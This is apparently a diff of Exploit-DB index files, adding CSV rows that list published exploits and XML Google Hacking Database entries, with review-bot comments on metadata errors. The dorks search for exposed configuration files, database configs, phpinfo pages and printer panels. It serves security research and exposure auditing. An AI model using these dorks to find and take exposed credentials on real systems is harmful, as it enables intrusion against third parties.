40867,exploits/hardware/remote/40867.txt,"Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities",2016-12-05,"Persian Hack Team",remote,hardware,,2016-12-05,2016-12-05,0,,,,,,
51366,exploits/hardware/remote/51366.txt,"Sielco Analog FM Transmitter 2.12 - Remote Privilege Escalation",2023-04-14,LiquidWorm,remote,hardware,,2023-04-14,2023-04-14,0,,,,,,
7858,exploits/hardware/remote/7858.php,"Siemens ADSL SL2-141 - Cross-Site Request Forgery",2009-01-25,spdr,remote,hardware,,2009-01-24,,1,,,,,,
24065,exploits/hardware/remote/24065.java,"Siemens S55 - Cellular Telephone Sms Confirmation Message Bypass",2004-04-27,FtR,remote,hardware,,2004-04-27,2013-01-13,1,CVE-2004-2626;OSVDB-5703,,,,,https://www.securityfocus.com/bid/10227/info
38964,exploits/hardware/remote/38964.rb,"Siemens Simatic S7 1200 - CPU Command Module (Metasploit)",2015-12-14,"Nguyen Manh Hung",remote,hardware,102,2015-12-14,2015-12-14,0,,"Metasploit Framework (MSF)",,,,
@ -4716,6 +4718,14 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
25968,exploits/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - File Disclosure",2013-06-05,"Todor Donev",webapps,hardware,,2013-06-05,2016-12-05,0,OSVDB-94103,,,,,
44879,exploits/hardware/webapps/44879.md,"Siaberry 1.2.2 - Command Injection",2018-06-11,"Space Duck",webapps,hardware,,2018-06-12,2018-06-12,0,,,,,,https://blog.spaceduck.io/siaberry-1/
48646,exploits/hardware/webapps/48646.py,"Sickbeard 0.1 - Remote Command Injection",2020-07-07,bdrake,webapps,hardware,,2020-07-07,2020-07-07,0,,,,,,
51363,exploits/hardware/webapps/51363.txt,"Sielco Analog FM Transmitter 2.12 - 'id' Cookie Brute Force Session Hijacking",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
51364,exploits/hardware/webapps/51364.txt,"Sielco Analog FM Transmitter 2.12 - Cross-Site Request Forgery",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
51365,exploits/hardware/webapps/51365.txt,"Sielco Analog FM Transmitter 2.12 - Improper Access Control Change Admin Password",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
51371,exploits/hardware/webapps/51371.txt,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Account Takeover / Lockout / EoP",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
51367,exploits/hardware/webapps/51367.py,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Authentication Bypass Exploit",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
51368,exploits/hardware/webapps/51368.txt,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
51369,exploits/hardware/webapps/51369.txt,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Radio Data System POST Manipulation",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
51370,exploits/hardware/webapps/51370.txt,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Unauthenticated Information Disclosure",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
25416,exploits/hardware/webapps/25416.txt,"SimpleTransfer 2.2.1 - Command Injection",2013-05-13,Vulnerability-Lab,webapps,hardware,,2013-05-13,2013-05-13,0,OSVDB-93263,,,,,https://www.vulnerability-lab.com/get_content.php?id=937
49800,exploits/hardware/webapps/49800.html,"Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS)",2021-04-23,LiquidWorm,webapps,hardware,,2021-04-23,2021-10-28,0,,,,,,
49801,exploits/hardware/webapps/49801.html,"Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)",2021-04-23,LiquidWorm,webapps,hardware,,2021-04-23,2021-04-23,0,,,,,,
@ -9099,6 +9109,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
45107,exploits/macos/local/45107.txt,"Charles Proxy 4.2 - Local Privilege Escalation",2018-07-30,"Mark Wadham",local,macos,,2018-07-30,2018-07-30,0,CVE-2017-15358,Local,,,,https://m4.rkw.io/blog/cve201715358-local-root-privesc-in-charles-proxy-42.html
46724,exploits/macos/local/46724.txt,"Evernote 7.9 - Code Execution via Path Traversal",2019-04-18,"Dhiraj Mishra",local,macos,,2019-04-18,2019-04-18,0,CVE-2019-10038,Traversal,,,,https://www.inputzero.io/2019/04/evernote-cve-2019-10038.html
50696,exploits/macos/local/50696.py,"Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)",2022-02-02,LiquidWorm,local,macos,,2022-02-02,2022-02-02,0,,,,,,
51361,exploits/macos/local/51361.txt,"Google Chrome Browser 111.0.5563.64 - AXPlatformNodeCocoa Fatal OOM/Crash (macOS)",2023-04-14,LiquidWorm,local,macos,,2023-04-14,2023-04-14,0,,,,,,
44307,exploits/macos/local/44307.m,"Google Software Updater macOS - Unsafe use of Distributed Objects Privilege Escalation",2018-03-20,"Google Security Research",local,macos,,2018-03-20,2018-03-20,1,CVE-2018-6084,Local,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1486
43224,exploits/macos/local/43224.sh,"Hashicorp vagrant-vmware-fusion 4.0.23 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,,2017-12-06,2017-12-06,1,CVE-2017-11741,Local,,,,https://m4.rkw.io/blog/cve201711741-local-root-privesc-in-hashicorp-vagrantvmwarefusion--4023.html
43223,exploits/macos/local/43223.sh,"Hashicorp vagrant-vmware-fusion 4.0.24 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,,2017-12-06,2017-12-06,1,CVE-2017-12579,Local,,,,https://m4.rkw.io/blog/cve201712579-local-root-privesc-in-hashicorp-vagrantvmwarefusion-4024.html
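Review bot: entry 51361 is filed with type `local` although the advisory it indexes describes a hang and out-of-memory crash with no privilege or code-execution outcome; the CSV files comparable crash PoCs under `dos` (see the 51348 line removed below), so `dos` would be the consistent type here.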
@ -14836,6 +14847,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php,,2020-06-09,2020-06-09,0,CVE-2019-16113,,,,,
48942,exploits/php/webapps/48942.py,"Bludit 3.9.2 - Auth Bruteforce Bypass",2020-10-23,"Mayank Deshmukh",webapps,php,,2020-10-23,2020-11-13,1,CVE-2019-17240,,,,,
49037,exploits/php/webapps/49037.rb,"Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit)",2020-11-13,Aporlorxl23,webapps,php,,2020-11-13,2020-11-13,1,,,,,,
51360,exploits/php/webapps/51360.txt,"Bludit 4.0.0-rc-2 - Account takeover",2023-04-14,nu11secur1ty,webapps,php,,2023-04-14,2023-04-14,0,,,,,,
46060,exploits/php/webapps/46060.txt,"bludit Pages Editor 3.0.0 - Arbitrary File Upload",2018-12-27,BouSalman,webapps,php,80,2018-12-27,2019-01-02,0,CVE-2018-1000811,,,,http://www.exploit-db.combludit-3.0.0.zip,
11360,exploits/php/webapps/11360.txt,"Blue Dove - SQL Injection",2010-02-08,HackXBack,webapps,php,,2010-02-07,,0,,,,,,
7797,exploits/php/webapps/7797.php,"Blue Eye CMS 1.0.0 - 'clanek' Blind SQL Injection",2009-01-15,darkjoker,webapps,php,,2009-01-14,2017-01-17,1,OSVDB-51769;CVE-2009-0425,,,,,
@ -37231,7 +37243,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42997,exploits/windows/dos/42997.txt,"Microsoft Windows 10 - WLDP/MSHTML CLSID UMCI Bypass",2017-10-17,"Google Security Research",dos,windows,,2017-10-17,2017-10-17,1,CVE-2017-11823,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1328
47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows,,2019-12-20,2019-12-20,0,,,,,,
42007,exploits/windows/dos/42007.cpp,"Microsoft Windows 10 Kernel - 'nt!NtTraceControl (EtwpSetProviderTraits)' Pool Memory Disclosure",2017-05-15,"Google Security Research",dos,windows,,2017-05-15,2017-05-15,1,CVE-2017-0259,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1161
51348,exploits/windows/dos/51348.txt,"Microsoft Windows 11 - 'cmd.exe' Denial of Service",2023-04-08,"Milad karimi",dos,windows,,2023-04-08,2023-04-08,0,,,,,,
20437,exploits/windows/dos/20437.c,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (1)",1997-07-05,_eci,dos,windows,,1997-07-05,2012-08-11,1,"CVE-1999-0153 ;OSVDB-1666",,,,,https://www.securityfocus.com/bid/2010/info
20438,exploits/windows/dos/20438.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (2)",1997-05-07,_eci,dos,windows,,1997-05-07,2012-08-11,1,CVE-1999-0153;OSVDB-1666,,,,,https://www.securityfocus.com/bid/2010/info
20439,exploits/windows/dos/20439.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (3)",1997-05-07,_eci,dos,windows,,1997-05-07,2012-08-11,1,CVE-1999-0153;OSVDB-1666,,,,,https://www.securityfocus.com/bid/2010/info



@ -37156,6 +37156,22 @@ Google+ https://plus.google.com/u/0/114827336297709201563</textualDescription>
<date>2021-10-18</date>
<author>Roshdy Essam</author>
</entry>
<entry>
<id>8153</id>
<link>https://www.exploit-db.com/ghdb/8153</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Google Dork: intitle:&quot;index of&quot; &quot;properties.json&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;properties.json&quot;
# Files Containing Juicy Info
# Date: 13/04/2023
# Exploit Author: Arnob Biswas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;properties.json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;properties.json&quot;</querystring>
<edb></edb>
<date>2023-04-14</date>
<author>Arnob Biswas</author>
</entry>
<entry>
<id>7303</id>
<link>https://www.exploit-db.com/ghdb/7303</link>
@ -40429,6 +40445,21 @@ Category: Files Containing Juicy Info
<date>2022-09-19</date>
<author>HackerFrenzy</author>
</entry>
<entry>
<id>8155</id>
<link>https://www.exploit-db.com/ghdb/8155</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of &quot; &quot;config/db&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;properties.json&quot;
# Files Containing Juicy Info
# Date: 13/04/2023
# Exploit Author: Jerr279</textualDescription>
<query>intitle:&quot;index of &quot; &quot;config/db&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of &quot; &quot;config/db&quot;</querystring>
<edb></edb>
<date>2023-04-14</date>
<author>Jerr279</author>
</entry>
<entry>
<id>8132</id>
<link>https://www.exploit-db.com/ghdb/8132</link>
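Review bot: the `<textualDescription>` of entry 8155 contradicts the entry's own `<query>`: its header line reads `# Google Dork: intitle:&quot;index of&quot; &quot;properties.json&quot;` (the dork of entry 8153), while `<shortDescription>`, `<query>` and `<querystring>` all carry `intitle:&quot;index of &quot; &quot;config/db&quot;`. The header line should be changed to the config/db dork so the record is self-consistent. The first quoted term also has a trailing space inside the quotes (`&quot;index of &quot;`) in all three fields, unlike every neighbouring entry's `&quot;index of&quot;`; if that is not intentional it should be dropped.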
@ -42654,6 +42685,21 @@ DORK: intitle:&quot;index of&quot; &quot;config.js&quot;
<date>2021-10-04</date>
<author>Suman Das</author>
</entry>
<entry>
<id>8154</id>
<link>https://www.exploit-db.com/ghdb/8154</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;config.php&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;config.php&quot;
# Files Containing Juicy Info
# Date: 13/04/2023
# Exploit Author: Jerr279</textualDescription>
<query>intitle:&quot;index of&quot; &quot;config.php&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;config.php&quot;</querystring>
<edb></edb>
<date>2023-04-14</date>
<author>Jerr279</author>
</entry>
<entry>
<id>6048</id>
<link>https://www.exploit-db.com/ghdb/6048</link>
@ -49102,6 +49148,21 @@ Dxtroyer</textualDescription>
<date>2017-04-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>8156</id>
<link>https://www.exploit-db.com/ghdb/8156</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/private&quot; intext:&quot;index of /&quot; &quot;config&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/private&quot; intext:&quot;index of /&quot; &quot;config&quot;
# Files Containing Juicy Info
# Date: 13/04/2023
# Exploit Author: Jerr279</textualDescription>
<query>inurl:&quot;/private&quot; intext:&quot;index of /&quot; &quot;config&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/private&quot; intext:&quot;index of /&quot; &quot;config&quot;</querystring>
<edb></edb>
<date>2023-04-14</date>
<author>Jerr279</author>
</entry>
<entry>
<id>8152</id>
<link>https://www.exploit-db.com/ghdb/8152</link>
@ -52034,6 +52095,21 @@ Thanks &amp; Regards
<date>2021-01-07</date>
<author>Rushabh Doshi</author>
</entry>
<entry>
<id>8157</id>
<link>https://www.exploit-db.com/ghdb/8157</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:info.php intext:&quot;PHP Version&quot; intitle:&quot;phpinfo()&quot;</shortDescription>
<textualDescription># Google Dork: inurl:info.php intext:&quot;PHP Version&quot; intitle:&quot;phpinfo()&quot;
# Files containing juicy info.
# Date: 13/04/2023
# Exploit Author: Vitor Guaxi</textualDescription>
<query>inurl:info.php intext:&quot;PHP Version&quot; intitle:&quot;phpinfo()&quot;</query>
<querystring>https://www.google.com/search?q=inurl:info.php intext:&quot;PHP Version&quot; intitle:&quot;phpinfo()&quot;</querystring>
<edb></edb>
<date>2023-04-14</date>
<author>Vitor guaxi</author>
</entry>
<entry>
<id>4389</id>
<link>https://www.exploit-db.com/ghdb/4389</link>
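Review bot: the author name in entry 8157 is inconsistent between the two places it appears: `# Exploit Author: Vitor Guaxi` in `<textualDescription>` versus `<author>Vitor guaxi</author>`; one spelling should be used in both. The category line in the description (`# Files containing juicy info.`) also deviates from the `<category>` string `Files Containing Juicy Info` used by the other new entries in this commit.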
@ -105922,6 +105998,21 @@ temperature, etc) can be found.
<date>2006-10-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>8158</id>
<link>https://www.exploit-db.com/ghdb/8158</link>
<category>Various Online Devices</category>
<shortDescription>intitle:Web Image Monitor inurl:mainFrame.cgi</shortDescription>
<textualDescription># Google Dork: intitle:Web Image Monitor inurl:mainFrame.cgi
# Various Online Devices
# Date:14/04/2023
# Exploit Author: Hasan Ali YILDIR</textualDescription>
<query>Google Dork: Recoh Printer Properties Page</query>
<querystring>https://www.google.com/search?q=Google Dork: Recoh Printer Properties Page</querystring>
<edb></edb>
<date>2023-04-14</date>
<author>Hasan Ali YILDIR</author>
</entry>
<entry>
<id>4200</id>
<link>https://www.exploit-db.com/ghdb/4200</link>
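Review bot: in entry 8158 the `<query>` and `<querystring>` elements do not contain the dork at all; they hold the descriptive string `Google Dork: Recoh Printer Properties Page`, so the search URL would search for that phrase rather than for the dork given in `<shortDescription>` and `<textualDescription>` (`intitle:Web Image Monitor inurl:mainFrame.cgi`). `<query>` should carry the dork itself and `<querystring>` the corresponding `https://www.google.com/search?q=...` URL, as the other entries in this commit do. Minor: `# Date:14/04/2023` is missing the space after the colon that the sibling entries use, and `Recoh` in the description string is presumably meant to be `Ricoh` (the vendor whose devices serve a "Web Image Monitor" page).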